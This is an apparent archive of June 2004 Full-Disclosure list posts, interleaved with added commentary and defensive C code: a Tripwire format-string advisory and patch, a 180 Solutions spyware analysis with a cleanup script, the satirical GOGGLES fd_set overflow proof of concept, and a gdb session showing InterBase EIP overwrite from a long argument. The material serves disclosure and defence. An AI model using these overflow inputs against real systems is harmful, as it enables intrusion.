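    big[150] = '\0';
    snprintf(query, sizeof query,
             "sysPasswd=%s&sysPasswdConfirm=%s&UPnP_Work=1&FactoryDefaults=0", big, big);
    printf("over-long request: %s\n",
           parse_router_query(query, &f) == 0 ? "accepted" : "rejected");

    printf("normal request: %s\n",
           parse_router_query("sysPasswd=s3cret&sysPasswdConfirm=s3cret&UPnP_Work=1", &f) == 0
           && password_change_valid(&f) ? "accepted" : "rejected");
    return 0;
}
```

The request-rejection model matters as much as the bound itself: the advisory's second symptom (a password the admin can no longer log in with) is what you get when a handler stores a truncated or mismatched value after the overflow has already happened. Bounding does nothing against the delivery vector, which is plain cross-site request forgery against the management interface; that needs a per-session token on state-changing requests, which the workaround "don't click untrusted links" is standing in for.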
From: pherman at frenchfries.net (Paul Herman)
Date: Wed, 2 Jun 2004 16:41:16 -0700 (PDT)
Subject: [Full-Disclosure] Format String Vulnerability in Tripwire
Message-ID: <20040602234116.9A3674A5B@frenchfries.net>

SUMMARY
-------

Tripwire(tm) is a Security, Intrusion Detection, Damage Assessment and Recovery, Forensics software. A vulnerability in the product allows a user on the local machine under certain circumstances to execute arbitrary code with the rights of the user running the program (typically root).

VERSIONS AFFECTED
-----------------

Tripwire commercial versions <= 2.4
Tripwire open source versions <= 2.3.1

DETAILS
-------

A format string vulnerability exists when tripwire generates an email report (i.e. 'tripwire -m c -M'). Each line of the report is passed to an fprintf() function in pipedmailmessage.cpp in the following manner:

    fprintf(mpFile, s.c_str() );

If a local user were to create a file with a carefully crafted filename on the local system, that filename may be included in the report and passed to fprintf() (albeit from the heap.) No exploit is known at this time, but the author of this advisory believes this vulnerability could be exploitable. Tripwire Inc. has been notified and has implemented a fix.

IMPACT
------

This vulnerability allows an attacker to execute arbitrary code with the rights of the user running the file check, which is typically root. The vulnerability exists only when tripwire is used to generate an email report. Users who do not generate an email report are not affected by this vulnerability.

WORKAROUND
----------

Disable email reporting. All users are advised to upgrade to a version which is not vulnerable.
PATCH ----- If you are using Open Source Tripwire(tm) version 2.3.1, the following patch will fix this particular issue: Index: src/tripwire/pipedmailmessage.cpp =================================================================== retrieving revision 1.1 retrieving revision 1.2 diff -u -r1.1 -r1.2 --- src/tripwire/pipedmailmessage.cpp 21 Jan 2001 00:46:48 -0000 1.1 +++ src/tripwire/pipedmailmessage.cpp 26 May 2004 20:59:15 -0000 1.2 @@ -180,7 +180,7 @@ void cPipedMailMessage::SendString( const TSTRING& s ) { - if( _ftprintf( mpFile, s.c_str() ) < 0 ) + if( _ftprintf( mpFile, "%s", s.c_str() ) < 0 ) { TOSTRINGSTREAM estr; estr << TSS_GetString( cTripwire, tripwire::STR_ERR2_MAIL_MESSAGE_COMMAND ) AUTHOR OF ADVISORY ------------------ Paul Herman ACKNOWLEDGEMENT --------------- I would like to thank Robert C. Jacobson <8dgb6hw02 at sneakemail.com> for an initial bug report which led to me discovering this vulnerability. TRIPWIRE TRADEMARK NOTICE ------------------------- The developer of the original code and/or files is Tripwire, Inc. Portions created by Tripwire, Inc. are copyright 2000 Tripwire, Inc. Tripwire is a registered trademark of Tripwire, Inc. All rights reserved. Nothing in the GNU General Public License or any other license to use the code or files shall permit you to use Tripwire's trademarks, service marks, or other intellectual property without Tripwire's prior written consent in the form of a license agreement signed by an officer of Tripwire, Inc. If you have any questions, please contact Tripwire, Inc. at either info at tripwire.org or www.tripwire.org. From theinsider at 012.net.il Thu Jun 3 03:20:48 2004 
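Review bot: the literal "%s" in the new `_ftprintf( mpFile, "%s", s.c_str() )` call is a narrow string while everything around it is TCHAR-generic (`_ftprintf`, `TSTRING`, `TSS_GetString`); in a build where TCHAR is wide, `_ftprintf` expects a wide format and this line will not compile, so the format literal should go through the project's TCHAR literal macro as the rest of the file does. The substance of the change is right: the report line becomes an argument and can no longer be interpreted as a format, which removes the write primitive a `%n` in a filename would give. Consider also adding `-Wformat-security` / `-Wformat-nonliteral` to the build so any other printf-family call with a non-literal format (the pre-patch `fprintf(mpFile, s.c_str())` shape) is flagged before it reaches a release.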
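The DETAILS section of the Tripwire advisory above describes the bug class: a string the attacker influences (here a filename that ends up in the report) is passed as the format argument of a printf-family call. The block below is an added example, not Tripwire code and not from the advisory: it puts the vulnerable shape and the patched shape side by side, rendering into a buffer with snprintf instead of a pipe so the difference is observable, and adds a small counter for conversion directives that is useful when auditing report text before it reaches fprintf. The sample line is constructed. The demo only uses "%%", the one directive that consumes no argument, because that is the only input on which the vulnerable call is well defined; a "%x" would read stack, and a "%n" would write memory, which is the advisory's point.

```c
#include <stdio.h>
#include <string.h>

#if defined(__GNUC__)
/* The vulnerable function below deliberately passes a non-literal format;
 * silence the compiler so the comparison builds cleanly. */
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
#endif

/* Shape of cPipedMailMessage::SendString before the patch: the report line
 * itself is the format string. Rendered into a buffer rather than a pipe so
 * the effect can be observed. Only ever call it with input that contains no
 * conversions other than "%%": a "%n" would write to memory. */
int render_line_vulnerable(char *out, size_t n, const char *line)
{
    return snprintf(out, n, line);
}

/* Shape after the patch: the line is an argument, never a format. */
int render_line_fixed(char *out, size_t n, const char *line)
{
    return snprintf(out, n, "%s", line);
}

/* Number of conversion directives printf would act on in an untrusted
 * string: every '%' that is not part of a "%%" escape starts one. Handy
 * for auditing report text, filenames or log lines before they reach a
 * printf-family call. */
int count_format_directives(const char *s)
{
    int count = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* literal percent sign, consumes no argument */
            p++;
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    /* A report line carrying a filename a local user could create; constructed. */
    const char *line = "Added: /home/user/disk 50%% full";
    char buf[128];

    render_line_vulnerable(buf, sizeof buf, line);
    printf("vulnerable: %s\n", buf);   /* the "%%" has been interpreted */
    render_line_fixed(buf, sizeof buf, line);
    printf("fixed:      %s\n", buf);   /* the line is reproduced verbatim */
    printf("directives in \"/tmp/%%x%%x%%n\": %d\n",
           count_format_directives("/tmp/%x%x%n"));
    return 0;
}
```

The vulnerable rendering silently changes the report content even on harmless input, which is a cheap way to spot this bug in any program: if a filename containing "%%" comes out of a report with a single "%", the line went in as a format. The counter returns 3 for "/tmp/%x%x%n" and 0 for "/tmp/100%%".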
From: theinsider at 012.net.il (Rafel Ivgi, The-Insider)
Date: Thu, 3 Jun 2004 04:20:48 +0200
Subject: [Full-Disclosure] 180 Solutions Exploits and Toolbars Hacking Patched Users(I.E Exploits)
Message-ID: <000701c44911$62555e10$aa41b350@fucku>

180 Solutions Exploits and Toolbars Hacking Patched Users
By Rafel Ivgi, The-Insider

Table Of Contents:
*********************
1. Class Name
2. Infecting Files
3. Related Registry Entries
4. Cleaner
5. Solution
6. Visit : http://theinsider.deep-ice.com

1. Class Name: iiittt Class
****************************

*Comment : All actions performed on your machine are logged in the following hidden file: C:\WINDOWS\system32\log.bak.txt

Class Id : {FE1A240F-B247-4E06-A600-30E28F5AF3A0}

Downloading c:\install.cab
Executing c:\install.htm

2. Infecting Files:
********************

http://bis.180solutions.com/config.aspx?did=565&ver=5.4&duid=!!generate!!&partner_id=&product_id=&browser_ok=y&rnd=34&basename=msbb&SID=YJGHCHUV&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=42033152&TVM=2147352576&AVM=2084216832&FDS=1542299648&LAD=1601:1:1:0:0:0&WE=5
http://downloads.180solutions.com/keywords/kyf.258.gz to c:\windows\system32\kyf.dat
http://installs.180solutions.com/downloads/boom/2.0/RBoomerang.1 to C:\WINDOWS\abolaror.exe
http://bis.180solutions.com/config.aspx?did=565&ver=5.4&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=26&basename=msbb&SID=AZWDUFMF&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=49520640&TVM=2147352576&AVM=2070482944&FDS=1538985984&LAD=1601:1:1:0:0:0&WE=5
c:\windows\system32\FLEOK\msbb.exe from http://installs.180solutions.com/downloads/5.6/msbb.exe
http://installs.180solutions.com/downloads/5.6/msbb.exe to c:\windows\system32\FLEOK\msbb.exe
http://bis.180solutions.com/config.aspx?did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=9&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=70152192&TVM=2147352576&AVM=2070474752&FDS=1538723840&LAD=1601:1:1:0:0:0&WE=5&TCA=0&SCA=0&MRDS=0
http://installs.180solutions.com/Downloads/DLL/3.0/ncmyb.dll to c:\windows\system32\FLEOK\ncmyb.dll
http://tv.180solutions.com/showme.aspx?keyword=.tightasianass.com&did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=32&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&bid=0&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=61321216&TVM=2147352576&AVM=2051579904&FDS=1538109440&LAD=1601:1:1:0:0:0&WE=5
http://216.130.188.219/ei2/index.html
http://69.42.67.154/topbucks/tp2/index.html
http://216.130.188.219/ei2/installer.htm
http://69.42.67.154/topbucks/tp2/index.html
http://exits.freepornpics.com/timed_exits/straight_timed_pop.htm
http://216.130.188.219/ei2/index.html
http://69.42.67.154/_mpbfpas/free_trial_multisite/index.html
http://tv.180solutions.com/showme.aspx?keyword=trial&did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=23&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&bid=0&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=37040128&TVM=2147352576&AVM=2031108096&FDS=1536757760&LAD=1601:1:1:0:0:0&WE=5
http://exits.freepornpics.com/timed_exits/fpa_pinkpays.html
http://www.i-lookup.com/index1.php

3. Related Registry Entries:
******************************

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}]
@="iiittt Class"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Control]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented Categories]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InprocServer32]
@="C:\\WINDOWS\\System32\\windec32.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus]
@="0"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus\1]
@="131473"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ProgID]
@="windec.iiittt.1"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Programmable]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ToolboxBitmap32]
@="C:\\WINDOWS\\System32\\windec32.dll, 102"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\TypeLib]
@="{660B38CB-6349-4C67-A418-AADABAE09C38}"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Version]
@="1.0"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\VersionIndependentProgID]
@="windec.iiittt"

[HKEY_CLASSES_ROOT\windec.iiittt]
@="iiittt Class"

[HKEY_CLASSES_ROOT\windec.iiittt\CLSID]
@="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}"

[HKEY_CLASSES_ROOT\windec.iiittt\CurVer]
@="windec.iiittt.1"

[HKEY_CLASSES_ROOT\windec.iiittt.1]
@="iiittt Class"

[HKEY_CLASSES_ROOT\windec.iiittt.1\CLSID]
@="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}]
"SystemComponent"=dword:00000000
"Installer"="MSICD"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains\Files]
"C:\\WINDOWS\\System32\\windec32.dll"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\DownloadInformation]
"CODEBASE"="file://C:\\install.cab"
"INF"="C:\\WINDOWS\\Downloaded Program Files\\windec32.inf"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InstalledVersion]
@="2,0,0,0"

4. Cleaner:
*************

Filename=180killer.bat:

------------------------------------------- CUT HERE -------------------------------------------
REM Stop the browser, the shell and the COM surrogate so the dropped files are not locked
taskkill /f /im iexplore.exe
taskkill /f /im explorer.exe
taskkill /f /im dllhost.exe
del c:\install.htm
del c:\install.cab
REM Kill each dropped process, then delete its file
taskkill /f /im abolaror.exe
del C:\WINDOWS\abolaror.exe
taskkill /f /im msbb.exe
del c:\windows\system32\FLEOK\msbb.exe
taskkill /f /im apconaj.exe
del c:\windows\system32\apconaj.exe
taskkill /f /im alchem.exe
del c:\windows\alchem.exe
rmdir /s /q c:\windows\system32\FLEOK
rmdir /s /q c:\windows\sbnet
del C:\WINDOWS\System32\windec32.dll
REM Restart the shell
explorer.exe
REM Remove the autostart entries
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v ShowBehind /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v msbb /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v abolaror /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v chiqarsfneg /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v alchem /f
------------------------------------------- CUT HERE -------------------------------------------

5. Solution:
*************

The execution of this Internet Explorer exploit was caused by ms-its [even patched]. The ms-its protocol is not needed for Windows' normal operation, therefore it should be removed.

XPLizer - Windows Hardening Frontend Tool - updated for removing the ms-its protocol.
http://www.securiteam.com/tools/5EP081FCKI.html The sources of XPLizer can be found at http://theinsider.deep-ice.com/xplizer-src.zip An executable version can be found at http://theinsider.deep-ice.com/xplizer.zip The official readme file for XPLizer can be found at http://theinsider.deep-ice.com/readme.txt From etomcat at freemail.hu Thu Jun 3 10:25:14 2004 
From: etomcat at freemail.hu (Feher Tamas) Date: Thu, 3 Jun 2004 11:25:14 +0200 (CEST) Subject: [Full-Disclosure] Twenty years after 1984 or, well... Message-ID: http://www.theregister.co.uk/2004/06/03/text_punk/ Secret Police slap cuffs on Punk SMSer by Lucy Sherriff, TheRegister, 3 June 2004 A tech worker was arrested yesterday after a text message he sent was intercepted and traced back to his phone. In a scene reminiscent of Neo's first escape from Agent Smith, Special Branch officers slapped the cuffs on Mike Devine at his office in Bristol yesterday, and took him away for questioning. Devine, who plays in a Clash tribute band in his spare time, had sent a message containing lyrics from The Clash's Tommy Gun to his lead singer who had forgotten the words to the song. According to The Sun, the message read: "How about this for Tommy Gun? OK - SO LET'S AGREE ABOUT THE PRICE AND MAKE IT ONE JET AIRLINER AND TEN PRISONERS" The arrest has prompted speculation about how the message was intercepted. Police maintain that Devine's message went astray. They say he actually sent it to a woman in Bristol by mistake and it was she who alerted police to the content. !>However, The Sun quotes Chris Dobson, a terrorism expert, as !>saying that the interception clearly shows that GCHQ is !>monitoring all vocal and textual mobile phone traffic. Devine himself is slightly bemused by the incident. He said: "It hadn't even occurred to me that it might look a bit dodgy. It was quite nerve wracking for Special Branch to come looking for you at work. I was thinking, Oh God, what have I done?" The police questioned Devine about his phone, and asked if he had used it to send texts at the end of April. They showed him a print out of the text and asked him to confirm that he had sent it. "I said, 'That's the lyrics from Tommy Gun. I'm in a tribute band'," Devine said. 
Fortunately, once he explained that the message was not part of a terrorist plot, the police accepted his explanation and let him go, but not before suggesting to Devine that he be careful about where he sent such messages in future. Big Brother is watching you! From goggles at hush.com Thu Jun 3 11:19:15 2004 
From: goggles at hush.com (goggles at hush.com) Date: Thu, 3 Jun 2004 03:19:15 -0700 Subject: [Full-Disclosure] GOGGLES ADVISORY: FLAW IN MAJOR DISTRIBUTIONS Message-ID: <200406031019.i53AJIsL030902@mailserver2.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _,--, _ __,-'____| ___ /' | /' `\,--,/' `\ /' | ( ) ( )' \_ _/' `\_ _/ """ """ I R WATCHING Y0U GOGGLES SECURITY ADVISORY #forty-two GOGGLES has discovered attempt of big security company to disclose bug in many major UNIX variants. GOGGLES believes in perfect world and security bug should not be disclosed by company to make quick fame and money, but to selflessly strive for collective effort to make better and more secure world for everyone to live in. GOGGLES strives for this and decides to regulate release of information with this ethical ideal in mind and not capitalistic gain for big company. GOGGLES explicitly disclaims credit for discovery, and has to tell world company did not make discovery either, even if it claims so afterwards. Discovery seems to have been made by tribes of pagans and heretics who are yet to achieve Enlightenment and discover True Path of Full-Disclosure. Problem GOGGLES did not discover but tries to make perfect world with is in libc select() function. select() is bad way to do event driven notification for io events, GOGGLES believes true men and real women use epoll or kqueue these days, and that only real idiots use /dev/poll. select() is bad for security as well, as Theo de Raadt proved with OpenBSD operating system. Pagans discovered fd_set structure select() uses often allocates static amount of space for monitoring descriptors for events. Proof of concept code kindly provided in sys/select.h from glibc, where idiots coded: __fd_mask fds_bits[__FD_SETSIZE / __NFDBITS]; GOGGLES notes that every descriptor is tracked by single bit, and this way normally 128 bytes will be reserved for 1024 descriptors. 
Pagans decided that rlimit for amount open files is 1024 as well, so code will not go *BOOM* and is more secure than OpenBSD code (note: in this respect they seem to be right).

Now pagans decided that rlimit for amount of open files raised above 1024 could make select() *BOOM* and proceeded to check theory. GOGGLES did check on glibc bits/select.h to verify pagan idea, and found that bigger idiots coded amongst others:

# define __FD_SET(fd, fdsp) \
  __asm__ __volatile__ ("btsl %1,%0" \
                        : "=m" (__FDS_BITS (fdsp)[__FDELT (fd)]) \
                        : "r" (((int) (fd)) % __NFDBITS) \
                        : "cc","memory")

So pagan hypothesis would work in theory, GOGGLES not believed eyes, and continued test with proof-of-concept code for believers in True Path who are more rigid than pagans in accepting the obvious and comprehending the world around them; this of course in perfect analogy with christians and pagans we all heard of.

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/select.h>
#include <unistd.h>

int main(void)
{
    struct rlimit _;
    char __[256];          /* the neighbour that gets overwritten */
    fd_set ___;            /* holds bits for FD_SETSIZE (1024) descriptors */
    unsigned int ____;

    /* raise the open-file limit far above FD_SETSIZE (needs root to go past the hard limit) */
    _.rlim_cur = _.rlim_max = 0xDULL + 0xC0DE;
    if(setrlimit(RLIMIT_NOFILE, &_) == -1) {
        fprintf(stderr, "GOGGLE GOGGLE\n");
        exit(EXIT_FAILURE);
    }

    memset(__, 0, sizeof(__));
    for(____ = 3; ____ < 1024; ____++)
        close(____);

    /* open enough descriptors that FD_SET sets bits past the end of ___ */
    for(____ = 0; ____ < 1024 + sizeof(__) * 8; ____++) {
        int _;
        if( (_ = open("/dev/null", O_RDONLY)) != -1)
            FD_SET(_, &___);
        else {
            fprintf(stderr, "GOGGLE GOGGLE\n");
            exit(EXIT_FAILURE);
        }
    }

    printf("%s\n", &0[__]); /* diz is to look stupid */
}

Now GOGGLES run example code on Linux machine at home, and find this output:

????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????0???A

GOGGLES realize that to exploit problem rlimit has to be raised, which can only be done as root, even with local access.
But, GOGGLES and pagans reasoned, if server such as inetd or so raises rlimit by itself to something higher than 1024 then by making connections we can call FD_SET and overflow fd_set structure with bits. GOGGLES believes in perfect world, and therefore will not release proof of concept exploit, since in perfect world no crackers exist who will run it, and every administrator is smart enough to see problem from illustrations above. GOGGLES does not want contact about this bug, and since pagans do not have telephones GOGGLES does not have way to reach them for more information. However, provided are following numbers of company trying to make big money by stealing pagan techniques and not aim to make world a good place to live in, so people can ask for more information about financial exploitation of software consumers for information which is free in perfect world. This is great way to start your own security company. +31-70-3111010 (ask for Patrick Oonk or Mark Lastdrager) +31-70-3107390 (ask for Iljitsch van Beijnum) +31-50-5420781 (ask for Joost Pol or the hacker that defaced cn.freebsd.org) +31-6-26630263 or +31-6-53760017 (ask for {} or if you cannot pronounce this, ask for the hacker that defaced apache.org) Or send fax of favourite underpants worn for weeks to: +31-70-3111011 +31-70-3635911 GOGGLES is sad to not know for sure if all numbers work, but at least should be enough to provide public with usable information. GOGGLES hopes to have made world slightly better place this way, and prevent commercial rip-off of poor software consumers and false claims to discovery we see from many security company, and especially XFORCE- ISS. Signed, GOGGLES -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkC++x8ACgkQ42dM9omIJ0TrFgCfesdGtJMDWC1yFPqf41UUhXn2+N0A n3Y8l4IcFYnNIo0/g4AQKrDZVi8U =fvjl -----END PGP SIGNATURE----- Concerned about your privacy? 
Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434 Promote security and make money with the Hushmail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 From noamr at beyondsecurity.com Thu Jun 3 11:36:33 2004 
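The GOGGLES post above makes one concrete point under the noise: glibc's FD_SET does no bounds check, so once a process's RLIMIT_NOFILE is above FD_SETSIZE any code that calls FD_SET on a descriptor it received (an accept()ed socket, say) writes bits past the end of its fd_set, and a daemon that raises its own limit does this to itself. The block below is an added example, not from the post and not glibc code: a bounds-checked FD_SET wrapper, a check for whether the current process is in the risky state, and a clamp that lowers the soft limit back to FD_SETSIZE (lowering needs no privilege, so a select()-based daemon can do this at startup). Function names are mine.

```c
#include <stdio.h>
#include <sys/resource.h>
#include <sys/select.h>

/* glibc's FD_SET does no bounds check, so a descriptor >= FD_SETSIZE sets a
 * bit past the end of the fd_set (the *BOOM* in the post). This wrapper
 * refuses such descriptors instead. Returns 0 if the bit was set, -1 if not. */
int safe_fd_set(int fd, fd_set *set)
{
    if (fd < 0 || fd >= FD_SETSIZE)
        return -1;
    FD_SET(fd, set);
    return 0;
}

/* 1 if this process can be handed a descriptor that does not fit in an
 * fd_set, i.e. the soft RLIMIT_NOFILE exceeds FD_SETSIZE; 0 if it cannot;
 * -1 if the limit cannot be read. */
int select_overflow_possible(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_NOFILE, &rl) != 0)
        return -1;
    if (rl.rlim_cur == RLIM_INFINITY)
        return 1;
    return rl.rlim_cur > (rlim_t)FD_SETSIZE;
}

/* Lower the soft limit so no descriptor number can reach FD_SETSIZE. Lowering
 * never needs privilege; the hard limit is left alone. Returns 0 on success.
 * A daemon that must keep more than FD_SETSIZE files open should not be
 * calling select() at all: poll(), epoll or kqueue have no such ceiling. */
int clamp_nofile_to_fd_setsize(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_NOFILE, &rl) != 0)
        return -1;
    if (rl.rlim_cur != RLIM_INFINITY && rl.rlim_cur <= (rlim_t)FD_SETSIZE)
        return 0;
    rl.rlim_cur = FD_SETSIZE;
    return setrlimit(RLIMIT_NOFILE, &rl);
}

int main(void)
{
    fd_set set;
    FD_ZERO(&set);
    printf("FD_SETSIZE=%d, sizeof(fd_set)=%zu bytes\n", (int)FD_SETSIZE, sizeof set);
    printf("overflow possible before clamp: %d\n", select_overflow_possible());
    if (clamp_nofile_to_fd_setsize() == 0)
        printf("overflow possible after clamp:  %d\n", select_overflow_possible());
    printf("safe_fd_set(3)=%d  safe_fd_set(FD_SETSIZE)=%d\n",
           safe_fd_set(3, &set), safe_fd_set(FD_SETSIZE, &set));
    return 0;
}
```

Two caveats. The clamp only protects code in this process; a descriptor number is per-process, so a parent that raised the limit and then fork()ed a select()-based child has handed the problem down. And on current glibc built with _FORTIFY_SOURCE, FD_SET on an out-of-range descriptor aborts with a "buffer overflow detected" message rather than silently corrupting memory, which turns the post's overwrite into a crash but is still a remotely triggerable denial of service for a server that raised its limit.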
From: noamr at beyondsecurity.com (Noam Rathaus) Date: Thu, 3 Jun 2004 13:36:33 +0300 Subject: [Full-Disclosure] Re: Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow In-Reply-To: <40BE8707.6090707@secnetops.com> References: <200406012040.14839.aviram@beyondsecurity.com> <200406021043.25680.noamr@beyondsecurity.com> <40BE8707.6090707@secnetops.com> Message-ID: <200406031336.33787.noamr@beyondsecurity.com> On Thursday 03 June 2004 05:03, KF (lists) wrote: > Someone that has had some success communicating things security wise to > Borland may wish to contact them about this. > > [root at CloneRiot bin]# rpm -ivh /root/InterBaseSS_LI-V7.1.0-1.i386.rpm > > [kf at CloneRiot bin]$ pwd > /opt/interbase/bin > [kf at CloneRiot bin]$ ./gsec -database 127.0.0.1:`perl -e'print ("A"x300)'` > > (gdb) c > Continuing. > [New Thread 1085279152 (LWP 21355)] > [New Thread 1095769008 (LWP 21356)] > [New Thread 1106258864 (LWP 21357)] > > Program received signal SIGSEGV, Segmentation fault. > [Switching to Thread 1085279152 (LWP 21355)] > 0x41414141 in ?? () > (gdb) bt > #0 0x41414141 in ?? () > #1 0x41414141 in ?? () > #2 0x41414141 in ?? () > ... > #35 0x41414141 in ?? () > #36 0x41414141 in ?? () > (gdb) > > (gdb) i r > eax 0x0 0 > ecx 0x82025e4 136324580 > edx 0x0 0 > ebx 0x81fe29c 136307356 > esp 0x40aff5f8 0x40aff5f8 > ebp 0x41414141 0x41414141 > esi 0x12c 300 > edi 0x40affab8 1085274808 > eip 0x41414141 0x41414141 > eflags 0x10246 66118 > > (gdb) x/1s $esp > 0x40aff5f8: 'A' > > [root at CloneRiot interbase]# ./bin/ibserver > Segmentation fault > -KF > > Noam Rathaus wrote: > >On Sunday 02 June 2002 01:52, KF (lists) wrote: > >>So is this firebird specific or does it also impact Borland Interbase > >>users? > >>-KF > > > >We haven't tested Borland's Interbase as we didn't have any installation > >available for testing. 
> > However I can assume that since this vulnerability
> > appears in version 1.0.2, which is of very close resemblance to Borland's
> > Interbase sources, that the vulnerability may also affect it.

Hi,

Well it appears that the Borland version is a bit more vulnerable, or in other words more exploitable, as in Firebird I was unable to directly modify EIP, while it appears that the Borland version's EIP is easily modifiable.

Thank you for the assistance in verifying whether Borland's Interbase is also vulnerable.

--
Thanks
Noam Rathaus
CTO
Beyond Security Ltd.

Join the SecuriTeam community on Orkut: http://www.orkut.com/Community.aspx?cmm=44441

From blancher at cartel-securite.fr Thu Jun 3 10:47:54 2004
From: blancher at cartel-securite.fr (Cedric Blancher)
Date: Thu, 03 Jun 2004 11:47:54 +0200
Subject: [Full-Disclosure] watch guard
In-Reply-To: <006a01c4494b$b8c639b0$9f64a8c0@eng>
References: <006a01c4494b$b8c639b0$9f64a8c0@eng>
Message-ID: <1086256074.1960.10.camel@anduril.intranet.cartel-securite.net>

On Thu 03/06/2004 at 11:18, sudharsha wrote:
> Does any one know a vulnarability in Watch guard?

http://www.cartel-securite.fr/pbiondi/adv/CARTSA-20030314-icmpleak.txt

It applied to Watchguard boxes, but is patched, and firewalls should now be shipped with non-vulnerable firmwares.

--
http://www.netexit.com/~sid/
PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
>> Hi! I'm your friendly neighbourhood signature virus.
>> Copy me to your signature file and help me spread!

From security at greymagic.com Thu Jun 3 14:52:32 2004
From: security at greymagic.com (GreyMagic Software)
Date: Thu, 3 Jun 2004 15:52:32 +0200
Subject: [Full-Disclosure] Simple Yahoo! Mail Cross-Site Scripting (GM#006-MC)
Message-ID: <20040603125050.6E270FC0C3@bela.bezeqint.net>

GreyMagic Security Advisory GM#006-MC
=====================================

GreyMagic Software, 03 Jun 2004.

Available in HTML format at http://www.greymagic.com/security/advisories/gm006-mc/.

Topic: Simple Yahoo! Mail Cross-Site Scripting.

Discovery date: 16 May 2004.

Affected applications:
======================

* Yahoo! web-based email service.

Introduction:
=============

